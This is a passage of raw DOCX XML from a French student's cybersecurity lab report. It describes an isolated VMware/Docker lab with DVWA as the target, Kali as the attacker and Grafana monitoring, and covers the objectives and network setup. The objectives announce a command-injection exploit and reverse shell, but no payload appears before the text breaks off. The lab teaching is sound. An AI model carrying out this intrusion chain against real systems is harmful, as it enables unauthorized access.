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7B7B" w14:textId="77777777" w:rsidR="00A96198" w:rsidRPr="00DD5771" w:rsidRDefault="00000000" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD5771">
        <w:rPr>
          <w:b/>
          <w:color w:val="1A365D"/>
          <w:sz w:val="48"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>RAPPORT DE TRAVAUX PRATIQUES</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD5771">
        <w:rPr>
          <w:b/>
          <w:color w:val="1A365D"/>
          <w:sz w:val="48"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:br/>
        <w:t>LABORATOIRE DE CYBERSÉCURITÉ ET SECOPS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43FCF700" w14:textId="77777777" w:rsidR="00A96198" w:rsidRPr="00DD5771" w:rsidRDefault="00000000" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:spacing w:after="960"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD5771">
        <w:rPr>
          <w:color w:val="2B6CB0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">Déploiement, Analyse de Faille (Red Team) et Supervision en Temps Réel (Blue Team) via VMware, Docker et </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DD5771">
        <w:rPr>
          <w:color w:val="2B6CB0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Grafana</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5A9C8241" w14:textId="77777777" w:rsidR="00A96198" w:rsidRPr="00DD5771" w:rsidRDefault="00A96198" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="413DEDDA" w14:textId="77777777" w:rsidR="00A96198" w:rsidRPr="00DD5771" w:rsidRDefault="00A96198" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FDA8FCB" w14:textId="77777777" w:rsidR="00A96198" w:rsidRPr="00DD5771" w:rsidRDefault="00A96198" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7ECB6983" w14:textId="77777777" w:rsidR="00A96198" w:rsidRPr="00DD5771" w:rsidRDefault="00A96198" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C9BAFB6" w14:textId="77777777" w:rsidR="00A96198" w:rsidRDefault="00A96198" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FAEA16A" w14:textId="77777777" w:rsidR="00DD5771" w:rsidRDefault="00DD5771" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74530668" w14:textId="77777777" w:rsidR="00DD5771" w:rsidRDefault="00DD5771" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C0E7AC7" w14:textId="77777777" w:rsidR="00DD5771" w:rsidRDefault="00DD5771" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DB242B4" w14:textId="77777777" w:rsidR="00DD5771" w:rsidRDefault="00DD5771" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B1F0727" w14:textId="77777777" w:rsidR="00DD5771" w:rsidRDefault="00DD5771" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F13FDB7" w14:textId="77777777" w:rsidR="00DD5771" w:rsidRDefault="00DD5771" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F34677A" w14:textId="77777777" w:rsidR="00DD5771" w:rsidRDefault="00DD5771" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EB22339" w14:textId="77777777" w:rsidR="00DD5771" w:rsidRDefault="00DD5771" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E6182E9" w14:textId="77777777" w:rsidR="00DD5771" w:rsidRDefault="00DD5771" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73778221" w14:textId="77777777" w:rsidR="00DD5771" w:rsidRDefault="00DD5771" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="789F9039" w14:textId="77777777" w:rsidR="00DD5771" w:rsidRDefault="00DD5771" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14E6678A" w14:textId="77777777" w:rsidR="00DD5771" w:rsidRDefault="00DD5771" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="463D729D" w14:textId="77777777" w:rsidR="00DD5771" w:rsidRDefault="00DD5771" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C5EC3F4" w14:textId="67A76D78" w:rsidR="00DD5771" w:rsidRPr="00EA3F4B" w:rsidRDefault="00EA3F4B" w:rsidP="00EA3F4B">
      <w:r>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00EA3F4B">
        <w:t>Name :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00EA3F4B">
        <w:t xml:space="preserve"> AKOLI </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EA3F4B">
        <w:t>N’kunu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EA3F4B">
        <w:t xml:space="preserve"> Komlan Ezekias Jude Nic</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">olas </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A75E0A9" w14:textId="77389D91" w:rsidR="00EA3F4B" w:rsidRPr="00EA3F4B" w:rsidRDefault="00000000" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:i/>
          <w:color w:val="718096"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA3F4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:color w:val="718096"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Étudiant : Spécialisation ASI (Systèmes &amp; Architecture Information)</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA3F4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:color w:val="718096"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:br/>
        <w:t>Institution : Collège de Paris Supérieur</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA3F4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:color w:val="718096"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:br/>
        <w:t>Date : Mai 2026</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA3F4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:color w:val="718096"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:br/>
        <w:t>Version : 1.0 (Final</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD5771">
        <w:rPr>
          <w:i/>
          <w:color w:val="718096"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A7FACF" w14:textId="4C923C8E" w:rsidR="00A96198" w:rsidRPr="00DD5771" w:rsidRDefault="00A96198" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C4DA101" w14:textId="77777777" w:rsidR="00A96198" w:rsidRPr="00DD5771" w:rsidRDefault="00000000" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="18" w:space="4" w:color="1A365D"/>
        </w:pBdr>
        <w:spacing w:before="360" w:after="160"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD5771">
        <w:rPr>
          <w:b/>
          <w:color w:val="1A365D"/>
          <w:sz w:val="36"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>1. INTRODUCTION ET OBJECTIFS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="392679FB" w14:textId="77777777" w:rsidR="00A96198" w:rsidRPr="00DD5771" w:rsidRDefault="00000000" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD5771">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">Ce rapport documente la mise en place et l'exploitation d'un laboratoire de cybersécurité complet combinant l'analyse offensive (Red Team) et la supervision défensive en temps réel (Blue Team / </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DD5771">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>SecOps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DD5771">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>). L'infrastructure repose sur la virtualisation locale via VMware Workstation Player, garantissant un cloisonnement strict du trafic de test par rapport au réseau physique de production.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14226B20" w14:textId="77777777" w:rsidR="00A96198" w:rsidRPr="00DD5771" w:rsidRDefault="00000000" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD5771">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Les objectifs clés de ce laboratoire sont :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07747568" w14:textId="77777777" w:rsidR="00A96198" w:rsidRPr="00DD5771" w:rsidRDefault="00000000" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:pStyle w:val="Listepuces"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD5771">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>• Configurer un sous-réseau privé étanche (Host-Only) pour neutraliser tout risque d'exposition externe.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C8D4E6" w14:textId="77777777" w:rsidR="00A96198" w:rsidRPr="00DD5771" w:rsidRDefault="00000000" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:pStyle w:val="Listepuces"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD5771">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>• Déployer de manière industrielle une application délibérément vulnérable (DVWA) au moyen de conteneurs Docker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="489C4549" w14:textId="77777777" w:rsidR="00A96198" w:rsidRPr="00DD5771" w:rsidRDefault="00000000" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:pStyle w:val="Listepuces"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD5771">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>• Exécuter un cycle de test d'intrusion complet : reconnaissance réseau, identification de vecteurs d'attaque, exploitation d'une injection de commande OWASP et pivot vers un Reverse Shell interactif.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E1AD12B" w14:textId="77777777" w:rsidR="00A96198" w:rsidRPr="00DD5771" w:rsidRDefault="00000000" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:pStyle w:val="Listepuces"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD5771">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">• Implémenter une pile de supervision performante (Node Exporter, Prometheus, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DD5771">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Grafana</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DD5771">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>) pour corréler graphiquement l'activité offensive avec les anomalies de charge système et réseau.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D73BAE" w14:textId="77777777" w:rsidR="00A96198" w:rsidRPr="00DD5771" w:rsidRDefault="00000000" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="18" w:space="4" w:color="1A365D"/>
        </w:pBdr>
        <w:spacing w:before="360" w:after="160"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD5771">
        <w:rPr>
          <w:b/>
          <w:color w:val="1A365D"/>
          <w:sz w:val="36"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>2. ARCHITECTURE ET CONFIGURATION DU RÉSEAU (VMWARE PLAYER)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D1972FB" w14:textId="77777777" w:rsidR="00A96198" w:rsidRPr="00DD5771" w:rsidRDefault="00000000" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD5771">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Le principe fondamental de la sécurité du laboratoire est l'étanchéité. La machine cible ne doit disposer d'aucune passerelle vers l'extérieur pour empêcher toute fuite de charges utiles malveillantes ou compromission involontaire.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="145CC8D3" w14:textId="77777777" w:rsidR="00A96198" w:rsidRPr="00DD5771" w:rsidRDefault="00000000" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD5771">
        <w:rPr>
          <w:b/>
          <w:color w:val="2B6CB0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>2.1 Configuration des cartes réseau</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4690FEA0" w14:textId="77777777" w:rsidR="00A96198" w:rsidRPr="00DD5771" w:rsidRDefault="00000000" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD5771">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Sur VMware Workstation Player, nous configurons les machines de la manière suivante :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43850DE7" w14:textId="77777777" w:rsidR="00A96198" w:rsidRPr="00DD5771" w:rsidRDefault="00000000" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:pStyle w:val="Listenumros"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD5771">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>1. Machine Cible (Ubuntu Server) : Une seule interface réseau connectée sur le segment privé Host-Only.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62731F39" w14:textId="77777777" w:rsidR="00A96198" w:rsidRPr="00DD5771" w:rsidRDefault="00000000" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:pStyle w:val="Listenumros"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD5771">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>2. Machine Attaquante (Kali Linux) : Deux interfaces réseau. L'interface principale configurée en NAT (pour le maintien d'accès aux outils distants) et une seconde interface configurée en Host-Only sur le même commutateur virtuel que la cible.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7581B268" w14:textId="50F3E39E" w:rsidR="00A96198" w:rsidRDefault="00DD5771" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:spacing w:before="160" w:after="160"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="376FF77F" wp14:editId="5D768778">
            <wp:extent cx="5499100" cy="1820125"/>
            <wp:effectExtent l="0" t="0" r="635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5137" cy="1828743"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="282F74C8" w14:textId="77777777" w:rsidR="00DD5771" w:rsidRPr="00DD5771" w:rsidRDefault="00DD5771" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:spacing w:before="160" w:after="160"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25665E9C" w14:textId="77777777" w:rsidR="00491FD1" w:rsidRDefault="00491FD1" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="63484BFB" wp14:editId="518E6F49">
            <wp:extent cx="6496050" cy="2439831"/>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3061" cy="2442464"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E542CA" w14:textId="193F5AD2" w:rsidR="00DD5771" w:rsidRDefault="00DD5771" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="733B2E9B" w14:textId="77777777" w:rsidR="00A96198" w:rsidRPr="00DD5771" w:rsidRDefault="00A96198" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:spacing w:before="160" w:after="160"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56BEB28D" w14:textId="77777777" w:rsidR="00A96198" w:rsidRPr="00DD5771" w:rsidRDefault="00000000" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD5771">
        <w:rPr>
          <w:b/>
          <w:color w:val="2B6CB0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>2.2 Cartographie IP et Validation de l'Isolement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD4BE89" w14:textId="77777777" w:rsidR="00A96198" w:rsidRPr="00DD5771" w:rsidRDefault="00000000" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD5771">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Une fois les machines démarrées, nous interrogeons les configurations d'interfaces pour isoler les adresses réseau privées attribuées par le DHCP de VMware sur le commutateur Host-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DD5771">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>only</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DD5771">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8208"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A96198" w14:paraId="331B996A" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8208" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F4F8"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="389E7C84" w14:textId="77777777" w:rsidR="00A96198" w:rsidRDefault="00000000" w:rsidP="00EA3F4B">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282C34"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282C34"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> a</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="44D93998" w14:textId="77777777" w:rsidR="00A96198" w:rsidRDefault="00A96198" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:spacing w:before="160" w:after="160"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79600631" w14:textId="405A8A5B" w:rsidR="00491FD1" w:rsidRPr="00491FD1" w:rsidRDefault="00491FD1" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:spacing w:before="160" w:after="160"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-TG"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00491FD1">
        <w:rPr>
          <w:lang w:val="fr-TG"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="35EDA858" wp14:editId="7532FE81">
            <wp:extent cx="4274820" cy="1066800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="8937525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4820" cy="1066800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="080767F5" w14:textId="3E44C7F9" w:rsidR="00491FD1" w:rsidRPr="00491FD1" w:rsidRDefault="00491FD1" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:spacing w:before="160" w:after="160"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-TG"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00491FD1">
        <w:rPr>
          <w:lang w:val="fr-TG"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D04B103" wp14:editId="7EFCAB4E">
            <wp:extent cx="5943600" cy="1586865"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="15766169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86865"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D50A10" w14:textId="77777777" w:rsidR="00A96198" w:rsidRPr="00DD5771" w:rsidRDefault="00A96198" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:spacing w:before="160" w:after="160"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DAF58F9" w14:textId="77777777" w:rsidR="00A96198" w:rsidRPr="00491FD1" w:rsidRDefault="00000000" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD5771">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">Pour valider la sécurité logique de l'environnement, un test d'étanchéité internet est exécuté depuis le serveur cible. </w:t>
      </w:r>
      <w:r w:rsidRPr="00491FD1">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
